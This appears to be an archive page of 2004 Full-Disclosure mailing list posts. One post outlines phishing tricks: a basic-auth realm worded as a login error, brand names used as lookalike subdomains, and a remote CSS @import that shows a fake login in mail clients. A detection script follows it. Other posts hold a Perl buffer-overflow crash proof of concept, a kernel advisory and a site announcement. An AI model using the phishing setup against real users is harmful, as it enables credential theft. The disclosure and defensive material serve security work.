http://www.securitytrap.com
Security by full disclosure



[Full-Disclosure] Stupid Phishing Tricks

2004-05-21 Thread [EMAIL PROTECTED]


Phriday , May 21, 2004

Several pheeble yet interesting phishing possibilities arise as 
phollows:

Take one .htaccess trivially modified to suit the target 
scenario:

AuthName "EXCHANGE SERVER LOGIN ERROR: PLEASE TRY AGAIN"
AuthType Basic

One throw-away domain which can include the target's host name:

http://www.hotmail.hackerguy.nickelandimehosting.com
http://www.evenlargerbank.money.nickelandimehosting.com
http://www.bloatedcorp.lackey.nickelandimehosting.com

A couple of ridiculous email contraptions:


@import url( http://www.malware.com/pheesh );
 

1. Outlook Express

[screen shot http://www.malware.com/phool.png 56KB]

2. Outlook 2003

[screen shot: http://www.malware.com/ohlook.png 39KB]

note: the above 'style sheet' works on outbound [reply to] [so 
much for not downloading external content] inbound can be 
achieved as well via http://securityfocus.com/bid/10369 which 
has an even more convincing network login applet

3. Hotmail

[screen shot: http://www.malware.com/goturmail.png 91KB]

hint : hotmail[and other] web designer people; off-set the html 
login form on the site as many prime banks have done.

The possibilities are obviously endless.


BE AWARE OF THE SHARKS OUT THERE


NB: anyone have any contact or connection to the upper 
management security or abuse dept. of one public company called: 
SAVVIS Communications. http://savvis.net/ it appears their abuse 
dept. is woefully negligent in attending to abuse affairs.


End Call

-- 
http://www.malware.com
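
The three tricks in the post above, turned into checks a mail or proxy filter could run (an added example, not part of the original message; the brand table, the two-label registrable-domain shortcut and all function names are assumptions):

```python
import re
from urllib.parse import urlsplit

# Assumption: brands to watch and the registrable domains they really use.
# "hotmail" comes from the post; the second entry is a constructed placeholder.
BRANDS = {"hotmail": {"hotmail.com"},
          "evenlargerbank": {"evenlargerbank.example"}}

IMPORT_RE = re.compile(r"@import\s+(?:url\(\s*)?[\"']?(https?://[^\s\"')]+)", re.I)
REALM_RE = re.compile(r'realm="([^"]*)"', re.I)
PROMPT_RE = re.compile(r"\b(login|log in|error|try again|password)\b", re.I)


def registrable(host):
    """Last two labels only (assumption; use a public-suffix list in production)."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def brand_in_subdomain(url):
    """Return the brand used as a host label under somebody else's domain, or None."""
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    labels, base = host.split(".")[:-2], registrable(host)
    for brand, legit in BRANDS.items():
        if brand in labels and base not in legit:
            return brand
    return None


def remote_imports(html_body):
    """Remote style sheets a message body pulls in through @import."""
    return IMPORT_RE.findall(html_body)


def realm_looks_like_prompt(www_authenticate):
    """True when a Basic-auth realm is worded as an error or login instruction."""
    m = REALM_RE.search(www_authenticate)
    return bool(m and PROMPT_RE.search(m.group(1)))


if __name__ == "__main__":
    # Inputs taken from the post; the header line is how AuthName reaches the browser.
    print(brand_in_subdomain("http://www.hotmail.hackerguy.nickelandimehosting.com"))
    print(remote_imports("<style>@import url( http://www.malware.com/pheesh );</style>"))
    print(realm_looks_like_prompt(
        'Basic realm="EXCHANGE SERVER LOGIN ERROR: PLEASE TRY AGAIN"'))
```

A host such as www.bloatedcorp.lackey.nickelandimehosting.com is only flagged once "bloatedcorp" is added to the brand table, so the table has to list every name the filter is meant to protect.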








Re: [Full-Disclosure] Web interface for full-disclosure and others

2004-05-21 Thread William Warren
wow that's nice.. any chance of you setting up an rss feed of your site?

vertex wrote:

> Hello,
>
> I am building a web interface which will help make monitoring the 
> mailing list easier. The interface gets the RSS feeds from
> seclist.org and other web sites and converts them into a single
> web interface. Now the web interface includes full-disclosure,
> bugtraq, Internet Storm Center, OSVDB, and others. 
>
> The web interface also includes a Drupal based forum.
>
> Check it out at http://www.securitytrap.com/mail.html
>
> Any suggestion is welcome,
>
> -vertex

--
My "Foundation" verse:
Isa 54:17  No weapon that is formed against thee shall prosper; and 
every tongue that shall rise against thee in judgment thou shalt 
condemn. This is the heritage of the servants of the LORD, and their 
righteousness is of me, saith the LORD.



[Full-Disclosure] [TURBOLINUX SECURITY INFO] 21/May/2004

2004-05-21 Thread Turbolinux
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

This is an announcement only email list for the x86 architecture.

Turbolinux Security Announcement 21/May/2004


The following page contains the security information of Turbolinux Inc.

 - Turbolinux Security Center
   http://www.turbolinux.com/security/

 (1) kernel -> Multiple vulnerabilities within the kernel

===
* kernel -> Multiple vulnerabilities within the kernel
===

 More information :
The kernel package contains the Linux kernel (vmlinuz), the core of your Linux 
operating system.

- Real time clock (RTC) routines in Linux kernel do not properly initialize
  their structures, which could leak kernel data to user space.
- The R128 driver has a vulnerability.
- Stack-based buffer overflow in the ncp_lookup function for ncpfs in kernel.
- Buffer overflow in the ISO9660 file system component for Linux kernel.
- The OSS code for the Sound Blaster driver in Linux 2.4.x does not properly
  handle certain sample sizes, which allows local users to cause a denial of
  service (crash).
- The JFS file system code in Linux 2.4.x has an information leak in which
  in-memory data is written to the device for an ext3 file system, which
  allows local users to obtain sensitive information by reading the raw device.
- A "potential" buffer overflow exists in the panic() function in kernel.
- The do_fork function in Linux 2.4.x and 2.6.x does not properly decrement the
  mm_count counter when an error occurs after the mm_struct for a child process
  has been activated, which triggers a memory leak that allows local users to
  cause a denial of service (memory exhaustion).

 Impact :
The vulnerabilities may allow an attacker to cause a denial of
service to the kernel and gain sensitive information from your system. 

 Affected Products :
- Turbolinux Appliance Server 1.0 Hosting Edition
- Turbolinux Appliance Server 1.0 Workgroup Edition
- Turbolinux 10 Desktop
- Turbolinux 8 Server
- Turbolinux 8 Workstation
- Turbolinux 7 Server
- Turbolinux 7 Workstation

 Solution :
Please use the turbopkg (zabom) tool to apply the update. 
 -
 # turboupdate

 # turbopkg

 # zabom update kernel kernel-BOOT kernel-doc kernel-headers \
kernel-pcmcia-cs kernel-smp kernel-smp64G kernel-source
 -


 

   Source Packages
   Size : MD5

   kernel-2.4.25-3.src.rpm
 36845560 43f987c9ba58bef4d2052d517bae91a3

   Binary Packages
   Size : MD5

   kernel-2.4.25-3.i586.rpm
 13768395 961cb1242dc89e6b815cece76aecfe42
   kernel-BOOT-2.4.25-3.i586.rpm
  6894271 f2ed3e7abd7cba9d90a50a8996aa8115
   kernel-doc-2.4.25-3.i586.rpm
  1573387 4d5f79df18f678771d1a8470d21810e0
   kernel-headers-2.4.25-3.i586.rpm
  1986966 7c265f85713748fc7fd20df340c8d7ee
   kernel-pcmcia-cs-2.4.25-3.i586.rpm
   365681 f74d9b0d52602a69df8825831d92edca
   kernel-smp-2.4.25-3.i586.rpm
 14161425 9cc5b89c2f126904a2cca9ebd7700531
   kernel-smp64G-2.4.25-3.i586.rpm
 14139065 65dcf2069df77cd6ecd74b234187df8a
   kernel-source-2.4.25-3.i586.rpm
 27434031 a965e854d02602e541b26409e4d1d244

 


 

   Source Packages
   Size : MD5

   
   ftp://ftp.turbolinux.com/pub/TurboLinux/TurboLinux/ia32/Desktop/10/updates/SRPMS/kernel-2.6.0-8.src.rpm
 47387817 b0e9f3c652a6692b6d4741cd2e539453

   Binary Packages
   Size : MD5

   ftp://ftp.turbolinux.com/pub/TurboLinux/TurboLinux/ia32/Desktop/10/updates/RPMS/kernel-2.6.0-8.i586.rpm
 13148949 99104a31b0a0d5c71028a76d8bd00ad9
   ftp://ftp.turbolinux.com/pub/TurboLinux/TurboLinux/ia32/Desktop/10/updates/RPMS/kernel-doc-2.6.0-8.i586.rpm
  1662274 c2db44905b2022da855158cd38f0de33
   ftp://ftp.turbolinux.com/pub/TurboLinux/TurboLinux/ia32/Desktop/10/updates/RPMS/kernel-extramodules-2.6.0-8.i586.rpm
  2965265 69554343ca7d2a30a9636bd5255b0b45
   
ftp

Re: [Full-Disclosure] ActivePerl Perl2Exe [was] Buffer Overflow in ActivePerl ?

2004-05-21 Thread morning_wood
further testing...

c:\>type test1.pl
#test1.pl
$a="A" x 256; system($a);

http://[host]/test1.pl
[host - output ]
The instruction at "0x28073f63" referenced memory at "0x01c42ce0".
The memory could not be "read"

c:\>type test2.pl
#test2.pl
$a="A" x 261; system($a);

http://[host]/test2.pl
[host - output ]
The instruction at "0x28073f63" referenced memory at "0x42c42ce0".
The memory could not be "read"

Donnie Werner
http://exploitlabs.com


- Original Message -
From: "Stephen Blass" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Thursday, May 20, 2004 2:15 PM
Subject: RE: [Full-Disclosure] ActivePerl Perl2Exe [was] Buffer Overflow in
ActivePerl ?


> Perl2Exe rolls the interpreter up into the exe so if the interpreter is
> vulnerable, then the exe will be too.  With the service compiler you will have
> the same situation in services compiled as 'standalone'; if you compile
> 'dependent' services you are at the mercy of the perl interpreter on the system
> you deploy the service on.
>
> You can change the behavior of the perl 'system' in a perl script like so.
>
> use subs qw (system);
> sub system { my ($cmd) = @_; print "what, me run $cmd ? "; }
> $a="A" x 256; system($a);
>
> You can reach out from your custom system subroutine to the real thing if
> you'd like by calling CORE::system if you want to scrub arguments some more
> before passing them to the system.
>
> -
> Steve Blass
>
>
>
>
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] Behalf Of Clint
> Bodungen
> Sent: Thursday, May 20, 2004 12:44 PM
> To: morning_wood; 0day; [EMAIL PROTECTED]
> Subject: Re: [Full-Disclosure] ActivePerl Perl2Exe [was] Buffer Overflow
> in ActivePerl ?
>
>
> I haven't tested it yet but this also probably means that the msi/Microsoft
> service compiler in the Activeperl Developer's Kit is as well then.
>
>
> - Original Message -
> From: "morning_wood" <[EMAIL PROTECTED]>
> To: "0day" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
> Sent: Thursday, May 20, 2004 2:08 PM
> Subject: [Full-Disclosure] ActivePerl Perl2Exe [was] Buffer Overflow in
> ActivePerl ?
>
>
> > binaries created via perl2exe also are affected.
> >
> > C:\>type 1.pl
> > #
> > $a="A" x 256; system($a);
> >
> > C:\>perl2exe -v 1.pl
> > Perl2Exe V7.02 Copyright (c) 1997-2003 IndigoSTAR Software
> > Cmd = -v 1.pl
> > CWD = C:\
> > Known platforms: Win32
> > Target platform = Win32 5.006001
> > $I =
> > $ENV{'PERL5LIB'} =
> > Found perl.exe at C:\Perl\bin
> > LibList = C:\Perl\lib,C:\Perl\site\lib,.
> > Converting '1.pl' to 1.exe
> > Compiling 1.pl
> >
> > C:\>1.exe
> > [BIG CRASH]
> >
> > C:\>
> >
> >
> >
> > Donnie Werner
> > http://exploitlabs.com



[Full-Disclosure] Web interface for full-disclosure and others

2004-05-21 Thread vertex
Hello,

I am building a web interface which will help make monitoring the 
mailing list easier. The interface gets the RSS feeds from
seclist.org and other web sites and converts them into a single
web interface. Now the web interface includes full-disclosure,
bugtraq, Internet Storm Center, OSVDB, and others. 

The web interface also includes a Drupal based forum.

Check it out at http://www.securitytrap.com/mail.html

Any suggestion is welcome,

-vertex
-- 
http://www.securitytrap.com
Security by full disclosure
